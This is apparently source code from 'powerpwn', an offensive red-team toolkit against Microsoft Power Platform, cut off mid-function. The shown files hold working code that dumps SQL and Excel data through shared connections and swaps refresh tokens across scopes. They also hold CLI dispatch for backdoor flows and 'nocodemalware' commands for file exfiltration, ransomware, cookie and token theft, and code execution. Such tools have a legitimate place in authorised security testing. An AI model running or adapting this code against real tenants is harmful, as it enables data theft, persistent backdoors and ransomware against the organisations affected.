import json
from copy import deepcopy
from datetime import datetime
from typing import Dict

import prance
from pydantic import Field

from powerpwn.powerdump.collect.models.resource_entity_base import ResourceEntityBase
from powerpwn.powerdump.utils.json_utils import change_obj_recu


class Connector(ResourceEntityBase):
    api_name: str = Field(..., title="API Name")

    environment_id: str = Field(..., title="Environment ID")

    swagger: Dict = Field(..., title="OpenAPI spec")

    created_at: datetime = Field(..., title="Creation time")

    last_modified_at: datetime = Field(..., title="Last modified time")

    created_by: str = Field(..., title="Created by")

    version: str = Field(..., title="Connector version")

    def processed_swagger(self, connection_id: str, make_concrete: bool = False) -> Dict:
        # avoid side effects
        swagger_instance = deepcopy(self.swagger)

        # clean connectionId from path
        swagger_instance["paths"] = {k.replace("{connectionId}", connection_id): v for k, v in swagger_instance.get("paths", {}).items()}

        if make_concrete:
            # resolve references
            parser = prance.ResolvingParser(spec_string=json.dumps(swagger_instance))
            parsed_swagger = parser.specification

            # ensure examples are generate with rich schemas
            def _arrays_should_have_min_items(_val: Dict):
                if _val.get("type") == "array":
                    _val["minItems"] = 1

            change_obj_recu(val=parsed_swagger, obj_changer=_arrays_should_have_min_items)

            def _objects_should_have_all_properties(_val: Dict):
                if _val.get("type") == "object" and "required" not in _val:
                    _val["required"] = list(_val.get("properties", {}).keys())

            change_obj_recu(val=parsed_swagger, obj_changer=_objects_should_have_all_properties)
        else:
            parsed_swagger = swagger_instance

        return parsed_swagger



from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.excelonlinebusiness import ExcelOnlineBusinessConnector
from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.github import GitHubConnector
from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.gmail import GmailConnector
from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.keyvault import KeyVaultConnector
from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.shared_azureblob import SharedAzureBlobConnector
from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.shared_azurequeues import SharedAzureQueuesConnector
from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.shared_azuretables import SharedAzureTablesConnector
from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.shared_documentdb import SharedDocumentDBConnector
from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.shared_sql import SharedSqlConnector

CONNECTOR_CLS_SET = {
    KeyVaultConnector,
    GitHubConnector,
    GmailConnector,
    ExcelOnlineBusinessConnector,
    SharedSqlConnector,
    SharedDocumentDBConnector,
    SharedAzureTablesConnector,
    SharedAzureBlobConnector,
    SharedAzureQueuesConnector,
}
API_NAME_TO_CONNECTOR_CLS = {connector_cls.api_name(): connector_cls for connector_cls in CONNECTOR_CLS_SET}



from pydantic import Field

from powerpwn.machinepwn.models.command_args_properties_base_model import CommandArgsPropertiesBaseModel


class ExflirtateFileArgsProperties(CommandArgsPropertiesBaseModel):
    exfiltrate_target_file: str = Field(default="", help="Absolute path to file")



from datetime import datetime
from typing import Dict, Optional

from pydantic import Field, HttpUrl

from powerpwn.powerdump.collect.models.principal_entity import Principal
from powerpwn.powerdump.collect.models.resource_entity_base import ResourceEntityBase


class Connection(ResourceEntityBase):
    connection_id: str = Field(..., title="Connection ID")

    is_valid: bool = Field(..., title="Has no error indicators")
    shareable: bool = Field(..., title="Is connection shareable")

    connector_id: str = Field(..., title="Connector ID")
    api_id: str = Field(..., title="API ID")
    icon_uri: HttpUrl = Field(..., title="Icon URI")

    environment_id: str = Field(..., title="Environment ID")
    environment_name: str = Field(..., title="Environment Name")

    created_at: datetime = Field(title="Created time")
    last_modified_at: datetime = Field(title="Last modified time")
    expiration_time: Optional[datetime] = Field(title="Expiration time")

    created_by: Principal = Field(..., title="Created by")

    connection_parameters: Dict = Field(..., title="Connection parameters")
    test_uri: Optional[HttpUrl] = Field(..., title="Test URI")

    @property
    def api_name(self) -> str:
        return self.api_id.split("/")[-1]



from typing import Optional

from pydantic import Field

from powerpwn.powerdump.collect.models.base_entity import BaseEntity
from powerpwn.powerdump.collect.models.data_record_entity import DataRecordWithContext
from powerpwn.powerdump.utils.const import ENCODING


class DataDump(BaseEntity):
    extension: str = Field(..., title="File extension")
    encoding: Optional[str] = Field(title="Text encoding", default=ENCODING)
    content: bytes = Field(..., title="Content in bytes")


class DataDumpWithContext(BaseEntity):
    data_record: DataRecordWithContext = Field(..., title="Data record")
    data_dump: DataDump = Field(..., title="Data Dump")



from typing import Union

from pydantic import BaseModel, Field

from powerpwn.machinepwn.models.cleanup_command_args import CleanupCommandArgs
from powerpwn.machinepwn.models.code_exec_command_args import CodeExecCommandArgs
from powerpwn.machinepwn.models.exflirtate_file_command_args import ExflirtateFileCommandArgs
from powerpwn.machinepwn.models.ransomware_command_args import RansomwareCommandArgs
from powerpwn.machinepwn.models.steal_cookie_command_args import StealCookieCommandArgs
from powerpwn.machinepwn.models.steal_power_automate_token_command_args import StealPowerAutomateTokenCommandArgs


class AnyCommandArgs(BaseModel):
    __root__: Union[
        CleanupCommandArgs,
        CodeExecCommandArgs,
        RansomwareCommandArgs,
        ExflirtateFileCommandArgs,
        StealCookieCommandArgs,
        StealPowerAutomateTokenCommandArgs,
    ] = Field(discriminator="command_to_run")



import json
import logging
import os
import shutil

from powerpwn.cli.const import LOGGER_NAME
from powerpwn.machinepwn.enums.code_exec_type_enum import CodeExecTypeEnum
from powerpwn.machinepwn.enums.command_to_run_enum import CommandToRunEnum
from powerpwn.machinepwn.machine_pwn import MachinePwn
from powerpwn.powerdoor.backdoor_flow import BackdoorFlow
from powerpwn.powerdoor.enums.action_type import BackdoorActionType
from powerpwn.powerdoor.flow_factory_installer import FlowFlowInstaller
from powerpwn.powerdump.collect.data_collectors.data_collector import DataCollector
from powerpwn.powerdump.collect.resources_collectors.resources_collector import ResourcesCollector
from powerpwn.powerdump.gui.gui import Gui
from powerpwn.powerdump.utils.auth import acquire_token, acquire_token_from_cached_refresh_token
from powerpwn.powerdump.utils.const import API_HUB_SCOPE, POWER_APPS_SCOPE

logger = logging.getLogger(LOGGER_NAME)


def __init_command_token(args, scope: str) -> str:
    # if cached refresh token is found, use it
    if token := acquire_token_from_cached_refresh_token(scope, args.tenant):
        return token

    return acquire_token(scope=scope, tenant=args.tenant)


def run_dump_command(args):
    _run_collect_resources_command(args)
    _run_collect_data_command(args)
    logger.info(f"Dump is completed in {args.cache_path}")

    if args.gui:
        logger.info("Going to run local server for gui")
        run_gui_command(args)


def _run_collect_resources_command(args):
    # cache
    if args.clear_cache:
        try:
            shutil.rmtree(args.cache_path)
        except FileNotFoundError:
            pass
    os.makedirs(args.cache_path, exist_ok=True)

    token = __init_command_token(args, POWER_APPS_SCOPE)

    entities_fetcher = ResourcesCollector(token=token, cache_path=args.cache_path)
    entities_fetcher.collect_and_cache()


def run_gui_command(args):
    Gui().run(cache_path=args.cache_path)


def _run_collect_data_command(args):
    token = __init_command_token(args, API_HUB_SCOPE)
    DataCollector(token=token, cache_path=args.cache_path).collect()


def run_backdoor_flow_command(args):

    action_type = BackdoorActionType(args.backdoor_subcommand)
    if action_type == BackdoorActionType.delete_flow:
        backdoor_flow = BackdoorFlow(args.webhook_url)
        backdoor_flow.delete_flow(args.environment_id, args.flow_id)

    elif action_type == BackdoorActionType.create_flow:
        backdoor_flow = BackdoorFlow(args.webhook_url)
        backdoor_flow.create_flow_from_input_file(args.environment_id, args.input)

    elif action_type == BackdoorActionType.get_connections:
        backdoor_flow = BackdoorFlow(args.webhook_url)
        output_to_file = args.output and args.output != ""
        connections = backdoor_flow.get_connections(args.environment_id, not output_to_file)
        if output_to_file:
            f = open(args.output, "w+")
            f.write(json.dumps(connections, indent=4))
        else:
            logger.info(connections)

    elif action_type == BackdoorActionType.install_factory:
        token = __init_command_token(args, POWER_APPS_SCOPE)
        FlowFlowInstaller(token).install(args.environment_id, args.connection_id)


def run_nocodemalware_command(args):
    machine_pwn = MachinePwn(args.webhook_url)

    command_type = CommandToRunEnum(args.nocodemalware_subcommand)
    if command_type == CommandToRunEnum.CLEANUP:
        res = machine_pwn.cleanup()
    elif command_type == CommandToRunEnum.CODE_EXEC:
        res = machine_pwn.exec_command(args.command_to_execute, CodeExecTypeEnum(args.type))
    elif command_type == CommandToRunEnum.EXFILTRATION:
        res = machine_pwn.exfiltrate(args.file)
    elif command_type == CommandToRunEnum.RANSOMWARE:
        res = machine_pwn.ransomware(args.crawl_depth, args.dirs.split(","), args.encryption_key)
    elif command_type == CommandToRunEnum.STEAL_COOKIE:
        res = machine_pwn.steal_cookie(args.cookie)
    elif command_type == CommandToRunEnum.STEAL_POWER_AUTOMATE_TOKEN:
        res = machine_pwn.steal_power_automate_token()
    print(res)


def run_phishing_command(args):
    raise NotImplementedError("Phishing command has not been implemented yet.")



from abc import ABC, abstractmethod

import requests


class IDataCollector(ABC):
    @abstractmethod
    def collect(self, session: requests.Session, env_id: str, output_dir: str) -> None:
        ...



import logging

from art import tprint

from powerpwn.cli.arguments import parse_arguments
from powerpwn.cli.const import LOGGER_NAME
from powerpwn.cli.runners import run_backdoor_flow_command, run_dump_command, run_gui_command, run_nocodemalware_command, run_phishing_command

logger = logging.getLogger(LOGGER_NAME)


def main():
    print("\n\n------------------------------------------------------------")
    tprint("powerpwn")
    print("------------------------------------------------------------\n\n")

    args = parse_arguments()

    logging.basicConfig(level=args.log_level, format="%(asctime)s | %(name)s | %(levelname)s | %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
    logger.level = args.log_level
    command = args.command

    if command == "dump":
        run_dump_command(args)
    elif command == "gui":
        run_gui_command(args)
    elif command == "backdoor":
        run_backdoor_flow_command(args)
    elif command == "nocodemalware":
        run_nocodemalware_command(args)
    elif command == "phishing":
        run_phishing_command(args)
    else:
        logger.info("Run `powerpwn --help` for available commands.")


if __name__ == "__main__":
    main()



from pydantic import Field

from powerpwn.machinepwn.models.command_args_properties_base_model import CommandArgsPropertiesBaseModel


class StealCookieArgsProperties(CommandArgsPropertiesBaseModel):
    steal_cookie_fqdn: str = Field(help="fully qualified domain name to fetch the cookies of")



from powerpwn.enums.str_enum import StrEnum


class CommandToRunEnum(StrEnum):
    EXFILTRATION = "exfiltrate"
    RANSOMWARE = "ransomware"
    CODE_EXEC = "command-exec"
    CLEANUP = "cleanup"
    STEAL_POWER_AUTOMATE_TOKEN = "steal-power-automate-token"  # nosec
    STEAL_COOKIE = "steal-cookie"



import json
from typing import List

from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.connector_base import ConnectorBase
from powerpwn.powerdump.collect.data_collectors.enums.data_dump_type import DataDumpType
from powerpwn.powerdump.collect.models.data_dump_entity import DataDump
from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext
from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext
from powerpwn.powerdump.utils.const import ENCODING
from powerpwn.powerdump.utils.requests_wrapper import consecutive_gets, request_and_verify


class SharedSqlConnector(ConnectorBase):
    def _ping(self, connection_parameters: dict) -> List[DataStore]:
        data_stores: List[DataStore] = []

        # we dont have server/database for another auth types
        # if we use the /servers endpoint for other auth types we will get []
        if not (
            connection_parameters.get("name", "") in ("sqlAuthentication", "windowsAuthentication")
            or connection_parameters.get("authType", "") == "windows"
        ):
            return data_stores

        is_windows = connection_parameters.get("authType", "") == "windows"

        success, _, _ = request_and_verify(session=self._session, expected_status_prefix="200", method="get", url=f"{self._root}/testconnection")

        if success:
            data_stores.append(
                DataStore(
                    tenant=None,
                    account="temp",
                    scope=None,
                    host=f'https://{connection_parameters["server"]}.database.windows.net'
                    if is_windows
                    else f'https://{connection_parameters["values"]["server"]["value"]}',
                    name=connection_parameters["server"] if is_windows else connection_parameters["values"]["server"]["value"],
                    extra={},
                )
            )

        return data_stores

    def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]:
        data_records: List[DataRecord] = []

        can_list_databases, databases_val = consecutive_gets(
            session=self._session, expected_status_prefix="200", url=f"{self._root}/v2/databases?server={data_store.data_store.name}"
        )
        if can_list_databases:
            for db_obj in databases_val:
                db_name = db_obj["Name"]

                can_list_tables, tables_val = consecutive_gets(
                    session=self._session, expected_status_prefix="200", url=f"{self._root}/v2/datasets/{data_store.data_store.name},{db_name}/tables"
                )
                if can_list_tables:
                    for table in tables_val:
                        table_display_name = table["DisplayName"]
                        data_records.append(
                            DataRecord(
                                record_type=DataDumpType.table,
                                record_id=table["Name"],
                                record_name=f"{db_name}-{table_display_name}",
                                extra={"db_name": db_name},
                            )
                        )

        return data_records

    def _dump(self, data_record: DataRecordWithContext) -> DataDump:
        server_name = data_record.data_store.data_store.name
        db_name = data_record.data_record.extra["db_name"]
        success, val = consecutive_gets(
            session=self._session,
            expected_status_prefix="200",
            url=f"{self._root}/v2/datasets/{server_name},{db_name}/tables/{data_record.data_record.record_id}/items",
        )

        if not success:
            raise ValueError(
                f"Unable to fetch value for data type: {data_record.data_record.record_type} with ID: {data_record.data_record.record_id}."
            )

        table_value = json.dumps(val).encode(ENCODING)

        data_dump = DataDump(extension="json", encoding=ENCODING, content=table_value)
        return data_dump

    @classmethod
    def api_name(cls) -> str:
        return "shared_sql"

    @classmethod
    def _apim_path(cls) -> str:
        return "sql"



from typing import Dict, Optional

from pydantic import Field

from powerpwn.powerdump.collect.data_collectors.enums.data_dump_type import DataDumpType
from powerpwn.powerdump.collect.models.base_entity import BaseEntity
from powerpwn.powerdump.collect.models.data_store_entity import DataStoreWithContext


class DataRecord(BaseEntity):
    record_type: DataDumpType = Field(..., title="Record type")
    record_id: str = Field(..., title="Record ID")
    record_name: Optional[str] = Field(..., title="Record display name")
    extra: Dict = Field(..., title="Additional information")


class DataRecordWithContext(BaseEntity):
    data_store: DataStoreWithContext = Field(..., title="Data Store")
    data_record: DataRecord = Field(..., title="Data Record")



import logging
import os.path
from typing import Dict, Generator, List

from powerpwn.cli.const import LOGGER_NAME
from powerpwn.powerdump.collect.models.resource_entity_base import ResourceEntityBase
from powerpwn.powerdump.collect.resources_collectors._api import list_environments
from powerpwn.powerdump.collect.resources_collectors.canvas_apps_collector import CanvasAppsCollector
from powerpwn.powerdump.collect.resources_collectors.connections_collector import ConnectionsCollector
from powerpwn.powerdump.collect.resources_collectors.connectors_collector import ConnectorsCollector
from powerpwn.powerdump.collect.resources_collectors.enums.resource_type import ResourceType
from powerpwn.powerdump.utils.const import DATA_MODEL_FILE_EXTENSION
from powerpwn.powerdump.utils.path_utils import env_entity_type_path
from powerpwn.powerdump.utils.requests_wrapper import init_session

logger = logging.getLogger(LOGGER_NAME)


class ResourcesCollector:
    """
    A Class to collect resources and cache them in provided cache path
    """

    def __init__(self, cache_path: str, token: str) -> None:
        self.__cache_path = cache_path
        self.__session = init_session(token=token)
        self.__collectors = [CanvasAppsCollector, ConnectionsCollector, ConnectorsCollector]

    def collect_and_cache(self) -> None:
        """
        Collect resources and store them in cache

        Args:
            cache_path (str): cache path to store resources
        """
        environment_ids = list_environments(self.__session)
        logger.info(f"Found {len(environment_ids)} environments.")

        for env_id in environment_ids:
            connector_id_to_connection_ids: Dict[str, List[str]] = dict()
            for collector in self.__collectors:
                if collector in (ConnectionsCollector, ConnectorsCollector):
                    collector_instance = collector(connector_id_to_connection_ids)
                else:
                    collector_instance = collector()
                self._cache_entities(collector_instance.collect(self.__session, env_id), collector_instance.resource_type(), env_id)

    def _cache_entities(self, entities: Generator[ResourceEntityBase, None, None], entity_type: ResourceType, env_id: str) -> None:
        dir_name = env_entity_type_path(env_id, entity_type, self.__cache_path)
        os.makedirs(dir_name, exist_ok=True)
        for entity in entities:
            file_path = os.path.join(dir_name, entity.entity_id + DATA_MODEL_FILE_EXTENSION)
            with open(file_path, "w") as fp:
                fp.write(entity.json())



import json
from typing import Any, Dict, List

from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.connector_base import ConnectorBase
from powerpwn.powerdump.collect.data_collectors.enums.data_dump_type import DataDumpType
from powerpwn.powerdump.collect.models.data_dump_entity import DataDump
from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext
from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext
from powerpwn.powerdump.utils.const import ENCODING
from powerpwn.powerdump.utils.requests_wrapper import consecutive_gets, request_and_verify


class ExcelOnlineBusinessConnector(ConnectorBase):
    def _ping(self, connection_parameters: Dict[str, Any]) -> List[DataStore]:
        records: List[DataStore] = []

        sources_success, sources_val = consecutive_gets(
            session=self._session, expected_status_prefix="200", url=f"{self._root}/codeless/v1.0/sources"
        )

        if sources_success:
            for source in sources_val:
                source_id = source["id"]

                params = {"source": source_id}
                drives_success, drives_val = consecutive_gets(
                    session=self._session, expected_status_prefix="200", url=f"{self._root}/codeless/v1.0/drives", params=params
                )

                if drives_success:
                    for drive in drives_val:
                        records.append(
                            DataStore(
                                tenant=None,
                                account=connection_parameters["accountName"],
                                scope=None,
                                host=drive["webUrl"],
                                name=drive["name"],
                                extra={"source": source, "drive": drive},
                            )
                        )

        return records

    def __enum_dir(self, source_id: str, drive_id: str, folder_id: str) -> List[Dict[str, Any]]:
        file_objs: List[Dict[str, Any]] = []

        if folder_id == "root":
            folder_path = "root"
        else:
            folder_path = f"items/{folder_id}"

        params = {"source": source_id}
        can_list_folder, _, list_folder_val = request_and_verify(
            session=self._session,
            expected_status_prefix="200",
            method="get",
            url=f"{self._root}/codeless/v1.0/drives/{drive_id}/{folder_path}/children",
            params=params,
        )
        if can_list_folder:
            if not isinstance(list_folder_val, list):
                raise ValueError(f"Unexpected response list_folder_val: {list_folder_val}.")

            for file_or_dir_obj in list_folder_val:
                if not isinstance(file_or_dir_obj, dict):
                    raise ValueError(f"Unexpected response file_or_dir_obj: {file_or_dir_obj}.")
                if file_or_dir_obj["IsFolder"]:
                    file_objs += self.__enum_dir(source_id=source_id, drive_id=drive_id, folder_id=file_or_dir_obj["Id"])
                else:
                    file_objs += [file_or_dir_obj]

        return file_objs

    def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]:
        data_records: List[DataRecord] = []

        source_id = data_store.data_store.extra["source"]["id"]
        drive_id = data_store.data_store.extra["drive"]["id"]

        drive_files = self.__enum_dir(source_id=source_id, drive_id=drive_id, folder_id="root")

        for file_obj in drive_files:
            file_id = file_obj["Id"]

            params = {"source": source_id}
            tables_success, tables_val = consecutive_gets(
                session=self._session,
                expected_status_prefix="200",
                url=f"{self._root}/codeless/v1.0/drives/{drive_id}/items/{file_id}/workbook/tables",
                params=params,
            )

            if tables_success:
                for table_obj in tables_val:
                    table_id = table_obj["id"]

                    data_records.append(
                        DataRecord(
                            record_type=DataDumpType.table,
                            record_id=table_id,
                            record_name=f"{file_obj['Path']}/{table_obj['name']}",
                            extra={"file": file_obj, "table": table_obj},
                        )
                    )

        return data_records

    def _dump(self, data_record: DataRecordWithContext) -> DataDump:
        if data_record.data_record.record_type == DataDumpType.table:
            source_id = data_record.data_store.data_store.extra["source"]["id"]
            drive_id = data_record.data_store.data_store.extra["drive"]["id"]
            file_id = data_record.data_record.extra["file"]["Id"]
            table_id = data_record.data_record.extra["table"]["id"]

            success, rows_val = consecutive_gets(
                session=self._session,
                expected_status_prefix="200",
                url=f"{self._root}/drives/{drive_id}/files/{file_id}/tables/{table_id}/items",
                params={"source": source_id},
            )
            if success:
                extension = "json"
                encoding = ENCODING
                content = json.dumps(rows_val).encode(ENCODING)

        else:
            raise ValueError(f"Unsupported data type: {data_record.data_record.record_type}.")

        if not success:
            raise ValueError(
                f"Unable to fetch value for data type: {data_record.data_record.record_type} with ID: {data_record.data_record.record_id}."
            )

        data_dump = DataDump(extension=extension, encoding=encoding, content=content)
        return data_dump

    @classmethod
    def api_name(cls) -> str:
        return "shared_excelonlinebusiness"

    @classmethod
    def _apim_path(cls) -> str:
        return "excelonlinebusiness"



import json
import os
from typing import Dict, List, NamedTuple, Optional

TOKEN_CACHE_PATH = os.path.join(os.getcwd(), "tokens.json")


class TokenCache(NamedTuple):
    token_key: str
    token_val: str


def put_token(token_to_cache: TokenCache) -> None:
    put_tokens([token_to_cache])


def try_fetch_token(token_type: str) -> Optional[str]:
    if not os.path.exists(TOKEN_CACHE_PATH):
        return None

    tokens = __load_tokens()
    return tokens.get(token_type)


def put_tokens(tokens: List[TokenCache]) -> None:
    cached_tokens = {}
    if os.path.exists(TOKEN_CACHE_PATH):
        # json.load fails on "w+" permission
        cached_tokens = __load_tokens()
    f = open(TOKEN_CACHE_PATH, "w")
    for token in tokens:
        cached_tokens[token.token_key] = token.token_val
    f.write(json.dumps(cached_tokens, indent=4))
    f.close()


def __load_tokens() -> Dict[str, str]:
    with open(TOKEN_CACHE_PATH) as file:
        try:
            return json.load(file)
        except json.decoder.JSONDecodeError:
            return {}



import logging
from typing import Optional

import msal

from powerpwn.cli.const import LOGGER_NAME, TOOL_NAME
from powerpwn.powerdump.utils.const import API_HUB_SCOPE, AZURE_CLI_APP_ID, GRAPH_API_SCOPE, POWER_APPS_SCOPE
from powerpwn.powerdump.utils.token_cache import TOKEN_CACHE_PATH, TokenCache, put_token, put_tokens, try_fetch_token

logger = logging.getLogger(LOGGER_NAME)

AZURE_CLI_REFRESH_TOKEN = "cli_refresh_token"  # nosec
POWERAPPS_ACCESS_TOKEN = "powerapps_access_token"  # nosec
APIHUB_ACCESS_TOKEN = "apihub_access_token"  # nosec

SCOPE_TO_TOKEN_CACHE_TYPE = {API_HUB_SCOPE: APIHUB_ACCESS_TOKEN, POWER_APPS_SCOPE: POWERAPPS_ACCESS_TOKEN}


def acquire_token(scope: str, tenant: Optional[str] = None) -> str:
    """
    Leverage family refresh tokens to acquire a Graph API refresh token and exchange it for other required scopes
    https://github.com/secureworks/family-of-client-ids-research
    :param scope: token scope
    :return: Bearer token
    """
    logger.info(f"Acquiring token with scope={scope}.")

    azure_cli_client = __get_msal_cli_application(tenant)

    # Acquire Graph API refresh token
    device_flow = azure_cli_client.initiate_device_flow(scopes=[GRAPH_API_SCOPE])
    print(device_flow["message"])
    azure_cli_bearer_tokens_for_graph_api = azure_cli_client.acquire_token_by_device_flow(device_flow)  # blocking

    azure_cli_app_refresh_token = azure_cli_bearer_tokens_for_graph_api.get("refresh_token")

    azure_cli_bearer_tokens_for_scope = (
        # Same client as original authorization
        azure_cli_client.acquire_token_by_refresh_token(
            azure_cli_app_refresh_token,
            # But different scopes than original authorization
            scopes=[scope],
        )
    )

    bearer = azure_cli_bearer_tokens_for_scope.get("token_type") + " " + azure_cli_bearer_tokens_for_scope.get("access_token")
    logger.info(f"Access token for {scope} acquired successfully")

    # cache refresh token for cli to use in further FOCI authentication
    # cache access token for required scope
    tokens_to_cache = [
        TokenCache(token_key=AZURE_CLI_REFRESH_TOKEN, token_val=azure_cli_app_refresh_token),
        TokenCache(SCOPE_TO_TOKEN_CACHE_TYPE[scope], bearer),
    ]
    put_tokens(tokens_to_cache)
    logger.info(f"Token is cached in {TOKEN_CACHE_PATH}")

    return bearer


def acquire_token_from_cached_refresh_token(scope: str, tenant: Optional[str] = None) -> str:
    """
    Leverage family refresh tokens to acquire a Graph API refresh token and exchange it for other required scopes
    https://github.com/secureworks/family-of-client-ids-research
    :param scope: token scope
    :return: Bearer token
    """
    logger.info(f"Acquiring token with scope={scope} from cached refresh token.")

    cached_refresh_token = try_fetch_token(AZURE_CLI_REFRESH_TOKEN)

    if not cached_refresh_token:
        logger.info("Failed to acquire with refresh token. Fallback to device-flow")
        return acquire_token(scope, tenant)

    azure_cli_client = __get_msal_cli_application(tenant)

    azure_cli_bearer_tokens_for_scope = (
        # Same client as original authorization
        azure_cli_client.acquire_token_by_refresh_token(
            cached_refresh_token,
            # But different scopes than original authorization
            scopes=[scope],
        )
    )

    bearer = azure_cli_bearer_tokens_for_scope.get("token_type") + " " + azure_cli_bearer_tokens_for_scope.get("access_token")
    logger.info(f"Token for {scope} acquired from refresh token successfully.")

    # cache access token for required scope
    tokens_to_cache = TokenCache(SCOPE_TO_TOKEN_CACHE_TYPE[scope], bearer)
    put_token(tokens_to_cache)
    logger.info(f"Token is cached in {TOKEN_CACHE_PATH}")

    return bearer


def __get_msal_cli_application(tenant: Optional[str] = None) -> msal.PublicClientApplication:
    if tenant:
        authority = authority = f"https://login.microsoftonline.com/{tenant}"
        return msal.PublicClientApplication(AZURE_CLI_APP_ID, authority=authority, app_name=TOOL_NAME)
    else:
        return msal.PublicClientApplication(AZURE_CLI_APP_ID, app_name=TOOL_NAME)



from enum import Enum
from types import DynamicClassAttribute
from typing import Any, List, Optional, Type, TypeVar, cast

_TEnum = TypeVar("_TEnum", bound="StrEnum")


class StrEnum(str, Enum):
    """
    Base class for string valued enums, required for them to support JSON serialization.
    Subclasses that set values using `auto()` will have values equal to their names.
    """

    @classmethod
    def try_parse(cls: Type[_TEnum], string: str) -> Optional[_TEnum]:
        try:
            return cls(string)
        except ValueError:
            return None

    # So type checkers will recognize the return type is str
    @DynamicClassAttribute
    def value(self) -> str:
        return cast(str, super().value)

    # Type hints inspired by https://stackoverflow.com/questions/69318005/mypy-gives-an-incompatible-type-auto-expected-str-error-when-using-auto
    @staticmethod
    def _generate_next_value_(name: str, start: int, count: int, last_values: List[Any]) -> str:
        """
        Uses the name as the automatic value, rather than an integer
        See https://docs.python.org/3/library/enum.html#using-automatic-values for reference
        """
        return name

    def __str__(self) -> str:
        return self.value


def strenum_to_str(enum: Optional[StrEnum]) -> str:
    return enum.value if enum is not None else "None"



import logging
from typing import Dict, Generator, List

import requests

from powerpwn.cli.const import LOGGER_NAME
from powerpwn.powerdump.collect.models.connection_entity import Connection
from powerpwn.powerdump.collect.models.principal_entity import Principal
from powerpwn.powerdump.collect.resources_collectors._api import list_connections
from powerpwn.powerdump.collect.resources_collectors.enums.resource_type import ResourceType
from powerpwn.powerdump.collect.resources_collectors.iresource_collector import IResourceCollector

logger = logging.getLogger(LOGGER_NAME)


class ConnectionsCollector(IResourceCollector):
    def __init__(self, connector_id_to_connection_ids: Dict[str, List[str]]) -> None:
        self.__connector_id_to_connection_ids = connector_id_to_connection_ids

    def collect(self, session: requests.Session, environment_id: str) -> Generator[Connection, None, None]:
        total_connections_count = 0
        active_shareable_connections_count = 0
        raw_connections = list_connections(session, environment_id=environment_id)

        for raw_connection in raw_connections:
            total_connections_count += 1
            if raw_connection["properties"]["apiId"] != "/providers/Microsoft.PowerApps/apis/shared_logicflows" and (
                raw_connection["properties"]["statuses"][0]["status"] != "Connected"
            ):
                # ignore non-active or non shareable connections, other than Logic Flows
                continue

            active_shareable_connections_count += 1
            principal = Principal(
                entity_type=ResourceType.principal,
                entity_id=raw_connection["properties"]["createdBy"].get("id"),
                principal_id=raw_connection["properties"]["createdBy"].get("id"),
                type=raw_connection["properties"]["createdBy"].get("type"),
                tenant_id=raw_connection["properties"]["createdBy"].get("tenantId", "N/A"),
                display_name=raw_connection["properties"]["createdBy"].get("displayName"),
                email=raw_connection["properties"]["createdBy"].get("email"),
                upn=raw_connection["properties"]["createdBy"].get("userPrincipalName"),
                raw_json=raw_connection["properties"]["createdBy"],
            )

            connection_props = {
                "accountName": raw_connection["properties"].get("accountName"),
                **raw_connection["properties"].get("connectionParameters", {}),
                **raw_connection["properties"].get("connectionParametersSet", {}),
            }

            connection = Connection(
                entity_type=ResourceType.connection,
                entity_id=raw_connection["name"],
                connection_id=raw_connection["name"],
                display_name=raw_connection["properties"]["displayName"],
                is_valid=all([status_obj["status"] == "Connected" for status_obj in raw_connection["properties"]["statuses"]]),
                connector_id=raw_connection["properties"]["apiId"].replace("/providers/Microsoft.PowerApps/apis/", ""),
                api_id=raw_connection["properties"]["apiId"],
                icon_uri=raw_connection["properties"]["iconUri"],
                environment_id=raw_connection["properties"]["environment"]["id"]
                .replace("/providers/Microsoft.PowerApps/environments/", "")
                .replace("default", "Default"),
                environment_name=raw_connection["properties"]["environment"]["name"],
                created_at=raw_connection["properties"]["createdTime"],
                last_modified_at=raw_connection["properties"]["lastModifiedTime"],
                expiration_time=raw_connection["properties"].get("expirationTime"),
                created_by=principal,
                connection_parameters=connection_props,
                test_uri=raw_connection["properties"].get("testLinks", [{}])[0].get("requestUri"),
                shareable=raw_connection["properties"]["allowSharing"],
                raw_json=raw_connection,
            )

            self.__connector_id_to_connection_ids[connection.connector_id] = self.__connector_id_to_connection_ids.get(
                connection.connector_id, []
            ) + [connection.connection_id]

            yield connection
        logger.info(
            f"Found {active_shareable_connections_count} active shareable connections out of {total_connections_count} connections in environment {environment_id}"
        )

    def resource_type(self) -> ResourceType:
        return ResourceType.connection



import json
from typing import List

from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.connector_base import ConnectorBase
from powerpwn.powerdump.collect.data_collectors.enums.data_dump_type import DataDumpType
from powerpwn.powerdump.collect.models.data_dump_entity import DataDump
from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext
from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext
from powerpwn.powerdump.utils.const import ENCODING
from powerpwn.powerdump.utils.requests_wrapper import consecutive_gets, request_and_verify


class SharedDocumentDBConnector(ConnectorBase):
    def _ping(self, connection_parameters: dict) -> List[DataStore]:
        data_stores: List[DataStore] = []

        # we dont have server/database for another auth types
        if connection_parameters.get("name", "") != "keyBasedAuth":
            return data_stores

        success, _, _ = request_and_verify(session=self._session, expected_status_prefix="200", method="get", url=f"{self._root}/testconnection")

        db_name = connection_parameters["values"]["databaseAccount"]["value"]

        if success:
            data_stores.append(
                DataStore(tenant=None, account="temp", scope=None, host=f"https://{db_name}.table.cosmos.azure.com:443/", name=db_name, extra={})
            )

        return data_stores

    def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]:
        data_records: List[DataRecord] = []

